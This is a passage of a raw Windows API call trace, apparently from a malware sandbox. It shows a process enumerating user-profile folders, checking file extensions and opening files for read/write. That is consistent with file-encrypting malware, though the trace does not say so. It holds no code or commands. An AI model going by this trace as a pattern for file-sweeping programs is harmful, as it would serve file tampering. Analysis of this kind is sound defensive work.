dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.106] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 0 [0237.108] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0237.108] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.108] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.113] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.113] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.113] PathFindFileNameW (pszPath="") returned="" [0237.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.113] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 0xffffffff [0237.114] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0237.114] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.114] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.114] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.114] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.114] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.114] PathFindFileNameW (pszPath="") returned="" [0237.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.114] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14bcb600, ftCreationTime.dwHighDateTime=0x1d5c568, ftLastAccessTime.dwLowDateTime=0xf3e32010, ftLastAccessTime.dwHighDateTime=0x1d5bde0, ftLastWriteTime.dwLowDateTime=0xf3e32010, ftLastWriteTime.dwHighDateTime=0x1d5bde0, nFileSizeHigh=0x0, nFileSizeLow=0x168dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rl2ShyOqa7QJpEjNG.png", cAlternateFileName="RL2SHY~1.PNG")) returned 0xffffffff [0237.115] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.115] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.115] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.115] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.115] PathFindFileNameW (pszPath="") returned="" [0237.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.115] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.115] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.116] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.116] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0237.116] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0237.116] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.116] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4dd8 [0237.116] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95c98 [0237.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.116] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.116] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.117] PathFindFileNameW (pszPath="") returned="" [0237.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0237.117] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.117] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.117] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0237.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0237.117] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0237.117] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0237.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0237.117] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0237.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.118] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 